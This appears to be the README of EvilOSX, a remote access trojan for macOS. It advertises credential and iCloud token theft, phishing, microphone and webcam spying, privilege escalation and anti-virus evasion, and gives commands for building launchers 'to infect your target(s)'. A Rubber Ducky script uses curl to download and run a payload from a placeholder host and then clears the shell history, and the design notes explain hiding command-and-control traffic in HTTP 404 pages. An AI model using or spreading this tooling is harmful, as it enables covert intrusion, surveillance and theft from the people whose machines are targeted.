Awesome
<h1 align="center"> <br> <a href="https://github.com/Marten4n6/EvilOSX"><img src="/data/images/logo.png?raw=true" alt="Logo" width="280"></a> <br> EvilOSX <br> </h1> <h4 align="center">An evil RAT (Remote Administration Tool) for macOS / OS X.</h4> <p align="center"> <a href="https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt"> <img src="https://img.shields.io/badge/license-GPLv3-blue.svg?style=flat-square" alt="License"> </a> <a href="https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt"> <img src="https://img.shields.io/badge/python-2.7,%203.7-blue.svg?style=flat-square" alt="Python"> </a> <a href="https://github.com/Marten4n6/EvilOSX/issues"> <img src="https://img.shields.io/github/issues/Marten4n6/EvilOSX.svg?style=flat-square" alt="Issues"> </a> <a href="https://travis-ci.org/Marten4n6/EvilOSX"> <img src="https://img.shields.io/travis/Marten4n6/EvilOSX/master.svg?style=flat-square" alt="Build Status"> </a> <a href="https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md"> <img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat-square" alt="Contributing"> </a> </p>Marco Generator by Cedric Owens
This project is no longer active
Features
- Emulate a terminal instance
- Simple extendable module system
- No bot dependencies (pure python)
- Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
- Persistent
- GUI and CLI support
- Retrieve Chrome passwords
- Retrieve iCloud tokens and contacts
- Retrieve/monitor the clipboard
- Retrieve browser history (Chrome and Safari)
- Phish for iCloud passwords via iTunes
- iTunes (iOS) backup enumeration
- Record the microphone
- Take a desktop screenshot or picture using the webcam
- Attempt to get root via local privilege escalation
How To Use
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX
# Go into the repository
$ cd EvilOSX
# Install dependencies required by the server
$ sudo pip install -r requirements.txt
# Start the GUI
$ python start.py
# Lastly, run a built launcher on your target(s)
Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.
Advanced users
There's also a CLI for those who want to use this over SSH:
# Create a launcher to infect your target(s)
$ python start.py --builder
# Start the CLI
$ python start.py --cli --port 1337
# Lastly, run a built launcher on your target(s)
Screenshots
Motivation
This project was created to be used with my Rubber Ducky, here's the simple script:
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/
DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500
REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER
STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
- It takes about 10 seconds to backdoor any unlocked Mac, which is...... nice
- Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise. <br/>
- To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here. <br/> Aluminum Keyboard (ISO) is probably the one you are looking for.
Versioning
EvilOSX will be maintained under the Semantic Versioning guidelines as much as possible. <br/> Server and bot releases will be numbered with the follow format:
<major>.<minor>.<patch>
And constructed with the following guidelines:
- Breaking backward compatibility (with older bots) bumps the major
- New additions without breaking backward compatibility bumps the minor
- Bug fixes and misc changes bump the patch
For more information on SemVer, please visit https://semver.org/.
Design Notes
- Infecting a machine is split up into three parts:
- A launcher is run on the target machine whose only goal is to run the stager
- The stager asks the server for a loader which handles how a payload will be loaded
- The loader is given a uniquely encrypted payload and then sent back to the stager
- The server hides it's communications by sending messages hidden in HTTP 404 error pages (from BlackHat's "Hiding In Plain Sight")
- Command requests are retrieved from the server via a GET request
- Command responses are sent to the server via a POST request
- Modules take advantage of python's dynamic nature, they are simply sent over the network compressed with zlib, along with any configuration options
- Since the bot only communicates with the server and never the other way around, the server has no way of knowing when a bot goes offline
Issues
Feel free to submit any issues or feature requests here.
Contributing
For a simple guide on how to create modules click here.
Credits
- The awesome Empire project
- Shoutout to Patrick Wardle for his awesome talks, check out Objective-See
- manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts <br/> (now deleted... let me know if you reappear)
- The slowloris module is pretty much copied from PySlowLoris
- urwid and this code which saved me a lot of time with the CLI
- Logo created by motusora